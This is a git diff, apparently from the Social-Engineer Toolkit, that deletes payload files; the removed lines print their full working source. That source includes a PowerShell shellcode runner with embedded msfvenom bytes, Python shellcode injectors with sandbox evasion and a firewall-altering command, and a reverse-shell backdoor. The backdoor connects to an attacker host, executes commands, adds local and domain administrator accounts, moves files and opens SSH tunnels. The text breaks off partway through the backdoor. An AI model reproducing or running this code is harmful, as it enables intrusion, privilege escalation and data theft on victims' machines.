diff --git a/src/html/Signed_Update.jar.orig b/src/html/Signed_Update.jar.orig index d186574f2..bc5e02bf0 100644 Binary files a/src/html/Signed_Update.jar.orig and b/src/html/Signed_Update.jar.orig differ diff --git a/src/html/unsigned/unsigned.jar b/src/html/unsigned/unsigned.jar index fa39096d9..14748f56f 100644 Binary files a/src/html/unsigned/unsigned.jar and b/src/html/unsigned/unsigned.jar differ diff --git a/src/payloads/exe/shellcodeexec.binary b/src/payloads/exe/shellcodeexec.binary deleted file mode 100755 index c2e6118fc..000000000 Binary files a/src/payloads/exe/shellcodeexec.binary and /dev/null differ diff --git a/src/payloads/powershell/powershell_shellcode.code b/src/payloads/powershell/powershell_shellcode.code deleted file mode 100644 index 2708fde7a..000000000 --- a/src/payloads/powershell/powershell_shellcode.code +++ /dev/null @@ -1,45 +0,0 @@ -<# -Powershell Code Execution 'Exploit' -Author: Matthew Graeber (aka my superhero infosec crush) -Disclaimer: This code is provided for academic purposes only and should not be used for evil. You are liable for your own actions. -#> - -# Import required functions -$code = @" -[DllImport("kernel32.dll")] -public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); -[DllImport("kernel32.dll")] -public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); -[DllImport("msvcrt.dll")] -public static extern IntPtr memset(IntPtr dest, uint src, uint count); -"@ - -# Add CSharp code as a class recognized by Powershell -$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru - -# Copy and paste your shellcode here in the form 0xXX. -# 32-bit payload -# msfvenom windows/exec CMD="cmd /k calc" EXITFUNC=thread -[Byte[]]$sc32 = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00 - -# 64-bit payload -# msfpayload windows/x64/exec CMD="cmd /k calc" EXITFUNC=thread -[Byte[]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x6d,0x64,0x20,0x2f,0x6b,0x20,0x63,0x61,0x6c,0x63,0x00 - -# Determine if Powershell is running as 32 or 64 bit -[Byte[]]$sc = $sc32 -if ([IntPtr]::Size -eq 8) {$sc = $sc64} - -# Calculate correct size param for VirtualAlloc -$size = 0x1000 -if ($sc.Length -gt 0x1000) {$size = $sc.Length} - -# Allocate a page of memory. This will only work if the size parameter (3rd param) is at least 0x1000. -# Allocate RWX memory block -$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) - -# I could have more easily used memcpy but that would have required the use of a particular .NET class to cast $sc as an IntPtr. I wanted to get this working without needing additional .NET classes. I prefer to KISS (keep it simple, stupid). -for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)} - -# Execute you payload -$winFunc::CreateThread(0,0,$x,0,0,0) diff --git a/src/payloads/ratte/ratte.binary b/src/payloads/ratte/ratte.binary deleted file mode 100755 index 387a99a86..000000000 Binary files a/src/payloads/ratte/ratte.binary and /dev/null differ diff --git a/src/payloads/set_payloads/downloader.windows b/src/payloads/set_payloads/downloader.windows deleted file mode 100755 index e4f85644b..000000000 Binary files a/src/payloads/set_payloads/downloader.windows and /dev/null differ diff --git a/src/payloads/set_payloads/multi_pyinjector.binary b/src/payloads/set_payloads/multi_pyinjector.binary deleted file mode 100755 index 0d8158fce..000000000 Binary files a/src/payloads/set_payloads/multi_pyinjector.binary and /dev/null differ diff --git a/src/payloads/set_payloads/multi_pyinjector.py b/src/payloads/set_payloads/multi_pyinjector.py deleted file mode 100644 index ae1535df3..000000000 --- a/src/payloads/set_payloads/multi_pyinjector.py +++ /dev/null @@ -1,100 +0,0 @@ -# -# The Social-Engineer Toolkit Multi-PyInjector revised and simplified version. -# Version: 0.4 -# -# This will spawn only a seperate thread per each shellcode instance. -# -# Much cleaner and optimized code. No longer needs files and is passed via -# command line. -# -# Incorporates AES 256 Encryption when passing shellcode - -import ctypes -import sys -import subprocess -import os -import base64 -from Crypto.Cipher import AES -import multiprocessing -import threading - -# added sandbox evasion here - most sandboxes use only 1 core -if multiprocessing.cpu_count() < 2: - exit() - -# define our shellcode injection code through ctypes - - -def injection(sc): - sc = sc.decode("string_escape") - sc = bytearray(sc) - # Initial awesome code and credit found here: - # http://www.debasish.in/2012_04_01_archive.html - - ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), - ctypes.c_int(len(sc)), - ctypes.c_int(0x3000), - ctypes.c_int(0x40)) - ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), - ctypes.c_int(len(sc))) - buf = (ctypes.c_char * len(sc)).from_buffer(sc) - ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), - buf, - ctypes.c_int(len(sc))) - ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), - ctypes.c_int(0), - ctypes.c_int(ptr), - ctypes.c_int(0), - ctypes.c_int(0), - ctypes.pointer(ctypes.c_int(0))) - ctypes.windll.kernel32.WaitForSingleObject( - ctypes.c_int(ht), ctypes.c_int(-1)) -if __name__ == '__main__': - multiprocessing.freeze_support() - subprocess.Popen("netsh advfirewall set global StatefulFTP disable", - stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() - # this will be our ultimate filename we use for the shellcode generate - # by the Social-Engineer Toolkit - try: - - # our file containing shellcode - if len(sys.argv[1]) > 1: - payload_filename = sys.argv[1] - if os.path.isfile(payload_filename): - fileopen = open(payload_filename, "r") - sc = fileopen.read() - - # if we didn't file our shellcode path then exit out - if not os.path.isfile(payload_filename): - sys.exit() - - if len(sys.argv[2]) > 1: - # this is our secret key for decrypting the AES encrypted traffic - secret = sys.argv[2] - secret = base64.b64decode(secret) - # the character used for padding--with a block cipher such as AES, the value - # you encrypt must be a multiple of BLOCK_SIZE in length. This character is - # used to ensure that your value is always a multiple of BLOCK_SIZE - PADDING = '{' - BLOCK_SIZE = 32 - # one-liner to sufficiently pad the text to be encrypted - pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING - # one-liners to decrypt a string which will be our shellcode - DecryptAES = lambda c, e: c.decrypt( - base64.b64decode(e)).rstrip(PADDING) - cipher = AES.new(secret) - # our decrypted value for shellcode - sc = DecryptAES(cipher, sc) - # split our shellcode into a list - sc = sc.split(",") - - # except an indexerror and allow it to continue forward - except IndexError: - sys.exit() - - jobs = [] - for payload in sc: - if payload != "": - p = multiprocessing.Process(target=injection, args=(payload,)) - jobs.append(p) - p.start() diff --git a/src/payloads/set_payloads/pyinjector.binary b/src/payloads/set_payloads/pyinjector.binary deleted file mode 100755 index 1ddd281f7..000000000 Binary files a/src/payloads/set_payloads/pyinjector.binary and /dev/null differ diff --git a/src/payloads/set_payloads/pyinjector_args.py b/src/payloads/set_payloads/pyinjector_args.py deleted file mode 100644 index 7a77ba686..000000000 --- a/src/payloads/set_payloads/pyinjector_args.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/python -import ctypes -import sys -import multiprocessing - -# Written by Dave Kennedy (ReL1K) @ TrustedSec.com -# Injects shellcode into memory through Python and ctypes -# -# Initial awesome code and credit found here: -# http://www.debasish.in/2012_04_01_archive.html - -# added sandbox evasion here - most sandboxes use only 1 core -if multiprocessing.cpu_count() < 2: - exit() - -# see if we specified shellcode -try: - sc = sys.argv[1] - -# if we didn't specify a param -except IndexError: - sys.exit() - -# need to code the input into the right format through string escape -sc = sc.decode("string_escape") - -# convert to bytearray -sc = bytearray(sc) - -# use types windll.kernel32 for virtualalloc reserves region of pages in -# virtual address space -ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), - ctypes.c_int(len(sc)), - ctypes.c_int(0x3000), - ctypes.c_int(0x40)) - -# use virtuallock to lock region for physical address space -ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), - ctypes.c_int(len(sc))) - -# read in the buffer -buf = (ctypes.c_char * len(sc)).from_buffer(sc) - -# moved the memory in 4 byte blocks -ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), - buf, - ctypes.c_int(len(sc))) -# launch in a thread -ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), - ctypes.c_int(0), - ctypes.c_int(ptr), - ctypes.c_int(0), - ctypes.c_int(0), - ctypes.pointer(ctypes.c_int(0))) -# waitfor singleobject -ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht), ctypes.c_int(-1)) diff --git a/src/payloads/set_payloads/shell.py b/src/payloads/set_payloads/shell.py deleted file mode 100644 index d1982eb4e..000000000 --- a/src/payloads/set_payloads/shell.py +++ /dev/null @@ -1,1297 +0,0 @@ -#!/usr/bin/env python -from socket import * -import subprocess -import sys -import os -import base64 -import binascii -import threading -import select -import thread -import time -import random -import string -import sys -import logging -import paramiko -import tempfile -import ctypes - -# detect if we're on windows -if os.name == "nt": - operating_system = "windows" - import win32process - import win32api - import win32con - import pythoncom - import pyHook - import win32security - from ntsecuritycon import * - -# detect if we're on nix -if os.name == "posix": - operating_system = "posix" - -########################################################################## -# -# win32process is a third party module, will need to include it, download the windows binaries, be sure to use -# python 2.5, pyinstaller doesn't like anything above it for the byte compiling. -# -# Note to get pyinstaller to work it was compiled under Python 2.5, be sure to install things manually and -# not through Activestate. -# -# Download win32 modules needed for shell here: -# http://sourceforge.net/projects/pywin32/files/pywin32/Build216/pywin32-216.win32-py2.5.exe/download -# -# You will also need pyCrypto, it's a pain to install if you do it from source, should get the binary modules -# to make it easier. Can download from here: -# http://www.voidspace.org.uk/cgi-bin/voidspace/downman.py?file=pycrypto-2.0.1.win32-py2.5.zip -# -# Will need to download pyHooks from: -# http://sourceforge.net/projects/pyhook/files/pyhook/1.5.1/pyHook-1.5.1.win32-py2.5.exe/download -# -# Be sure to pack it via UPX first in order for the UPX encoding to work properly within SET. -# -########################################################################## -# -# -########################################################################## -# -# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction -# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary. -# -# Remember to use Python 2.5 for Windows, nothing above and don't use ActiveState, things break. -# -########################################################################## -# -# -########################################################################## -# -# For OSX installation, install ActiveState Python 2.7 and type: -# -# sudo pypm install paramiko -# -# You will then need to go into Configure.py in pyinstaller and look for "64bit". Change it to -# something garbage like dsifsdfidsfdshfois. This is a bug if it detects OSX in 64bit it will -# completely bomb. We fix it with the export VERSIONER below but it was still causing issues. -# Changing the 64bit thing will fix it completely. -# -# You will also need to edit Build.py, search for return '64bit' and change to return '32bit'. -# Another bug for detection. -# -# Then create a bash script and run the below from the command line: -# -# export VERSIONER_PYTHON_PREFER_32_BIT=yes -# python Configure.py -# python Makespec.py --onefile --noconsole shell.py -# python Build.py shell/shell.spec -# -# -# This will allow you to compile the shell via pyinstaller for OSX -# -# On LINUX it's easy just use pyinstaller ensure paramiko is installed -# -########################################################################## -# -# -########################################################################## -# -# download pyinstaller from: http://www.pyinstaller.org/ -# -# Make sure your using python2.5, anything above gets buggy. -# -# Make sure you have win32api, paramiko, pycrypto python modules installed -# -# Ensure to install pyinstaller 1.4, 1.5 is buggy. -# -# Unzip: and run the following commands on the shell.py file -# -# python Configure.py -# python Makespec.py --onefile --noconsole shell.py -# python Build.py shell\shell.spec -# -########################################################################## - -verbose = True - -# random value here to randomize builds -a = 50 * 5 - -# try block here -try: - # check for an ip address file if we aren't feeding it - temp = tempfile.gettempdir() # prints the current temporary directory - if os.path.isfile(temp + "/42logfile42.tmp"): - fileopen = open(temp + "/42logfile42.tmp", "r") - data = fileopen.read() - data = data.split(" ") - ipaddr = data[0] - port = data[1] - try: - os.remove(temp + "/42logfile42.tmp") - except: - pass - # create a socket object - sockobj = socket(AF_INET, SOCK_STREAM) - # parse the textfile - sockobj.connect((ipaddr, int(port))) - - if not os.path.isfile(temp + "/42logfile42.tmp"): - # create a socket object - sockobj = socket(AF_INET, SOCK_STREAM) - # parse command line arguments one and two. First is IP, second is port - sockobj.connect((sys.argv[1], int(sys.argv[2]))) - -# except index error which means user didn't specify IP and port -except IndexError: - # send error message - # if verbose == True: - print("\nThe Social-Engineer Toolkit Basic Shell\n\nSyntax: shell.exe ") - # exit the program - sys.exit() - -# except Exception -except Exception as e: - if verbose == True: - print(e) - - # sleep 10 seconds and try to connect again - try: - time.sleep(10) - # create a socket object - sockobj = socket(AF_INET, SOCK_STREAM) - - # parse command line arguments one and two. First is IP, second is port - sockobj.connect((sys.argv[1], int(sys.argv[2]))) - - # wait 10 more and try again - time.sleep(10) - - # create a socket object - sockobj = socket(AF_INET, SOCK_STREAM) - - # parse command line arguments one and two. First is IP, second is port - sockobj.connect((sys.argv[1], int(sys.argv[2]))) - - # if not give up - except Exception as e: - if verbose == True: - print(e) - sys.exit() - -# tell SET we are the interactive shell -# if we're nix -if operating_system == "windows": - send_string = "IHAYYYYYIAMSETANDIAMWINDOWS" -# if we're nix -if operating_system == "posix": - send_string = "IHAYYYYYIAMSETANDIAMPOSIXXX" -sockobj.send(send_string) - -# generate random strings - - -def generate_random_string(low, high): - length = random.randint(low, high) - letters = string.ascii_letters + string.digits - return ''.join([random.choice(letters) for _ in range(length)]) - rand_gen = random_string() - return rand_gen - -# this is what we use to either encrypt or not encrypt - - -def send_packet(message, sockobj, encryption, cipher): - - # if we encrypt or not - if encryption == 1: - - # we encrypt our output here - encoded = EncodeAES(cipher, message) - # we take the length of the encrypted string - normal_size = len(encoded) - # we turn the length of our string into a string literal - normal_size = str(normal_size) - # we encrypt our string literal - normal_size_crypt = EncodeAES(cipher, normal_size) - # we send our encrypted string literal to let our server know how long our - # true encrypted string is - sockobj.sendall(normal_size_crypt) - # we send our encrypted string - time.sleep(0.5) - sockobj.sendall(encoded) - - # if 0 then don't encrypt - if encryption == 0: - normal_size = str(len(message)) - message = str(message) - sockobj.send(normal_size) - sockobj.send(str(message)) - -# decrypt packet routine - - -def decrypt_packet(message, encryption, cipher): - - # if we support encryption - if encryption == 1: - return DecodeAES(cipher, message) - - # if we don't support encryption - if encryption == 0: - - return message - -# receive file from the attacker machine - - -def upload_file(filename): - - # define data as a received information from attacker machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our encrypted filepath - data = sockobj.recv(1024) - - # decrypted file path, not needed here - data = decrypt_packet(data, encryption, cipher) - - # specify file to write - filewrite = open(filename, "wb") - - # this will be our length for our file - data = sockobj.recv(1024) - - # decrypt the length of our file - data = decrypt_packet(data, encryption, cipher) - - # here is an ugly hack but it works, basically we set two - # counters. MSGLEN which will eventually equal the length - # of what number was sent to us which represented the length - # of the output of the shell command we executed. Dataout - # will eventually equal the entire string loaded into our - # buffer then sent for decryption. - # - # A loop is started which continues to receive until we hit - # the length of what our entire full encrypted shell output - # is equaled. Once that occurs, we are out of our loop and - # the full string is sent to the decryption routine and - # presented back to us. - - MSGLEN = 0 - dataout = "" - length = int(data) - while MSGLEN != length: - data = sockobj.recv(1024) - dataout += data - MSGLEN = MSGLEN + len(data) - - data = decrypt_packet(dataout, encryption, cipher) - filewrite.write(data) - - # close file after write - filewrite.close() - - # confirm its there - if os.path.isfile(filename): - send_packet("Confirmed", sockobj, encryption, cipher) - - # if its not then send back failed - if not os.path.isfile(filename): - send_packet("Failed", sockobj, encryption, cipher) - -# Note that this module does not come with pre-build binaries you will need either a compiler installed -# on your Windows machine or download the binary blobs from here: -# http://www.voidspace.org.uk/python/modules.shtml#pycrypto - -from Crypto.Cipher import AES - -# set encryption key to 1 -encryption = 1 - -# the block size for the cipher object; must be 16, 24, or 32 for AES -BLOCK_SIZE = 32 - -# the character used for padding--with a block cipher such as AES, the value -# you encrypt must be a multiple of BLOCK_SIZE in length. This character is -# used to ensure that your value is always a multiple of BLOCK_SIZE -PADDING = '{' - -# one-liner to sufficiently pad the text to be encrypted -pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING - -# random value here to randomize builds -a = 50 * 5 - -# one-liners to encrypt/encode and decrypt/decode a string -# encrypt with AES, encode with base64 -EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) -DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING) - -############################################# -# -# Reboot Server Code through Native -# API. -# -############################################# - - -def AdjustPrivilege(priv, enable=1): - # Get the process token - flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY - htoken = win32security.OpenProcessToken( - win32api.GetCurrentProcess(), flags) - # Get the ID for the system shutdown privilege. - idd = win32security.LookupPrivilegeValue(None, priv) - # Now obtain the privilege for this process. - # Create a list of the privileges to be added. - if enable: - newPrivileges = [(idd, SE_PRIVILEGE_ENABLED)] - else: - newPrivileges = [(idd, 0)] - # and make the adjustment - win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges) - - -def RebootServer(message='Rebooting', timeout=0, bForce=0, bReboot=1): - AdjustPrivilege(SE_SHUTDOWN_NAME) - try: - win32api.InitiateSystemShutdown( - None, message, timeout, bForce, bReboot) - finally: - # Now we remove the privilege we just added. - AdjustPrivilege(SE_SHUTDOWN_NAME, 0) - - -def AbortReboot(): - AdjustPrivilege(SE_SHUTDOWN_NAME) - try: - win32api.AbortSystemShutdown(None) - finally: - AdjustPrivilege(SE_SHUTDOWN_NAME, 0) - - -######################################## -# -# Start Paramiko Code here -# -######################################## - -def handler(chan, host, port): - sock = socket() - try: - sock.connect((host, port)) - - except Exception as e: - if verbose == True: - print(e) - return - - while True: - r, w, x = select.select([sock, chan], [], []) - if sock in r: - data = sock.recv(1024) - if len(data) == 0: - break - chan.send(data) - if chan in r: - data = chan.recv(1024) - if len(data) == 0: - break - sock.send(data) - chan.close() - sock.close() - -# here is where we start the transport request for port forward on victim -# then tunnel over via thread and handler - - -def reverse_forward_tunnel(server_port, remote_host, remote_port, transport): - - transport.request_port_forward('', server_port) - # while we accept transport via thread handler continue loop - while True: - chan = transport.accept(1000) - if chan is None: - continue - # define thread - thr = threading.Thread(target=handler, args=( - chan, remote_host, remote_port)) - # set thread as daemon - thr.setDaemon(True) - # start thread - thr.start() - -######################################## -# -# End Paramiko Code here -# -######################################## - -# main outside loop for the shell -try: - - while 1: - - # second inside loop - while 1: - - # receive socket connection from attacker - data = sockobj.recv(1024) - - if data == "quit" or data == "": - sys.exit() - - # if the length is 52 then we support encryption - if len(data) == 52: - encryption = 1 - sockobj.send(data) - data = sockobj.recv(1024) - data = binascii.unhexlify(data) - secret = data - cipher = AES.new(secret) - break - - # if the length is 51 then we don't support encryption - if len(data) == 51: - # if we don't support encryption then break out - cipher = "" - sockobj.send(data) - encryption = 0 - break - - # while true loop forever - while 1: - - # define data as a received information from attacker machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # leverage the previous data socket connection as our length for - # our next socket - data = sockobj.recv(int(data)) - - # this will be our actual data packet - data = decrypt_packet(data, encryption, cipher) - - # if data == quit or exit break out of main loop and renegotiate - # encryption - if data == "quit" or data == "exit": - break - - # if the attacker specifies a command shell lets get it ready - if data == "shell": - # specify another while loop to put us into the subprocess - # commands - while 1: - - # try block - try: - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be - # sent - data = decrypt_packet(data, encryption, cipher) - - # leverage the previous data socket connection as our - # length for our next socket - data = sockobj.recv(int(data)) - - # this will be our actual data packet - data = decrypt_packet(data, encryption, cipher) - # if we receive data 'exit' then break out of the loop - # but keep socket alive - if data == "exit" or data == "quit": - data = "" - # break out of the loop - break - - # note that you have to do some funky stuff with stdout, stderr, and stdin, - # when you use a non-console window subprocess bugs out (known since python - # 2.5.1). You need to pipe all the channels out to subprocess.PIPE then - # communicate with only stdout via proc.stdout.read() if not you will get a - # major error when running the shell. - - # send our command that would be 'data' - proc = subprocess.Popen( - data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - - # communicate with stdout and send it back to attacker - stdout_value = proc.stdout.read() - - # if we have an error just append to nothing if needed - stdout_value += proc.stderr.read() - - # do the actual send - send_packet(str(stdout_value) + "\r\n", - sockobj, encryption, cipher) - - # except a keyboard interrupt shouldn't actually hit this - # since we are using commands from attacker - except KeyboardInterrupt: - - # close socket - sockobj.close() - - # exit - sys.exit() - - # except all other errors - except Exception as e: - if verbose == True: - print(e) - # pass through them - pass - - # this section adds a local admin on the local system - if data == "localadmin": - try: - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # leverage the previous data socket connection as our - # length for our next socket - data = sockobj.recv(int(data)) - - # this will be our actual data packet - data = decrypt_packet(data, encryption, cipher) - - # split the data sent, should be seperated by a command "," - # which splits into a tuple - data = data.split(",") - - # this initiates subprocess.Popen as a shell command and - # uses net user to add a local user account initally - # locally - proc = subprocess.Popen("net user %s %s /ADD" % (data[0], data[ - 1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait() - - # this initiates subprocess.Popen as a shell command and - # uses net localgroup to add a local administrator - proc = subprocess.Popen("net localgroup administrators %s /ADD" % ( - data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait() - - # except exception - except Exception as e: - if verbose == True: - print(e) - pass - - # this section adds a domain admin on the local system - if data == "domainadmin": - try: - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # leverage the previous data socket connection as our - # length for our next socket - data = sockobj.recv(int(data)) - - # this will be our actual data packet - data = decrypt_packet(data, encryption, cipher) - - # split the data sent, should be seperated by a command "," - # which splits into a tuple - data = data.split(",") - - # this initiates subprocess.Popen as a shell command and - # uses net user to add a domain user account initially - proc = subprocess.Popen("net user %s %s /ADD /DOMAIN" % (data[0], data[ - 1]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait() - - # this initiates subprocess.Popen as a shell command and - # uses net group to add to domain admins - proc = subprocess.Popen('net group "Domain Admins" %s /ADD /DOMAIN' % ( - data[0]), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).wait() - - # except errors and don't pass them yet, will add to logging - # later - except Exception as e: - if verbose == True: - print(e) - pass - - # this section is if the attacker wants to download a file - if data == "downloadfile": - try: - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # leverage the previous data socket connection as our length for our next socket - # data=sockobj.recv(int(data)) - - data = sockobj.recv(1024) - - # this will be our actual data packet - download = decrypt_packet(data, encryption, cipher) - - # if the file isn't there let the listener know - if not os.path.isfile(download): - # send that the file isn't found - send_packet("File not found.", sockobj, - encryption, cipher) - - # if the file is there then cycle through it and let the - # listener know - if os.path.isfile(download): - # open the file for read/binary - fileopen = open(download, "rb") - data_file = "" - # while data send socket per line - for data in fileopen: - data_file += data - send_packet(data_file, sockobj, encryption, cipher) - - # except exception - except Exception as e: - if verbose == True: - print(e) - pass - - # this section is if the attacker wants to upload a file - if data == "uploadfile": - # try block - try: - - # define data as a received information from attacker - # machine - data = sockobj.recv(1024) - - # decrypt the packet which will tell us length to be sent - data = decrypt_packet(data, encryption, cipher) - - # this will be our encrypted filepath - data = sockobj.recv(1024) - - # decrypted file path - data = decrypt_packet(data, encryption, cipher) - - upload_path = data - - # specify file to write - filewrite = open(upload_path, "wb") - - # this will be our length for our file - data = sockobj.recv(1024) - - # decrypt the length of our file - data = decrypt_packet(data, encryption, cipher) - - # here is an ugly hack but it works, basically we set two - # counters. MSGLEN which will eventually equal the length - # of what number was sent to us which represented the length - # of the output of the shell command we executed. Dataout - # will eventually equal the entire string loaded into our - # buffer then sent for decryption. - # - # A loop is started which continues to receive until we hit - # the length of what our entire full encrypted shell output - # is equaled. Once that occurs, we are out of our loop and - # the full string is sent to the decryption routine and - # presented back to us. - - MSGLEN = 0 - dataout = "" - length = int(data) - while MSGLEN != length: - data = sockobj.recv(1024) - dataout += data - MSGLEN = MSGLEN + len(data) - - data = decrypt_packet(dataout, encryption, cipher) - filewrite.write(data) - - # close file after write - filewrite.close() - - # confirm its there - if os.path.isfile(upload_path): - send_packet("Confirmed", sockobj, encryption, cipher) - - # if its not then send back failed - if not os.path.isfile(upload_path): - send_packet("Failed", sockobj, encryption, cipher) - - # handle error messages - except Exception as e: - if verbose == True: - print(e) - pass - - # here is where we start our paramiko SSH tunneling - if data == "paramiko": - - # start initial try block - try: - # send to the server that we support paramiko - send_packet("Paramiko Confirmed.", - sockobj, encryption, cipher) - - # receive all of our variables to establish tunnel - data = sockobj.recv(1024) - # decrypt the packet - data = decrypt_packet(data, encryption, cipher) - - # receive all - data = sockobj.recv(int(data)) - data = decrypt_packet(data, encryption, cipher) - - # split into a tuple - data = data.split(",") - - # IP of the SSH server - ssh_server_ip = data[0] - # PORT of the SSH server - ssh_server_port_address = data[1] - # PORT to use on localhost for tunneled protcol - ssh_server_tunnel_port = data[2] - # username for SSH server - ssh_server_username = data[3] - # password for SSH server - ssh_server_password = data[4] - # PORT to forward from victim - victim_server_port = data[5] - # specify data as ssh_port_tunnel - - # main class here - def main(garbage_one, garbage_two, garbage_three): - # our ssh server - server = [ssh_server_ip, int(ssh_server_port_address)] - # what we want to tunnel - remote = ['127.0.0.1', int(victim_server_port)] - password = ssh_server_password # our password - client = paramiko.SSHClient() # use the paramiko SSHClient - client.load_system_host_keys() # load SSH keys - client.set_missing_host_key_policy( - paramiko.AutoAddPolicy()) # automatically add SSH key - - try: - 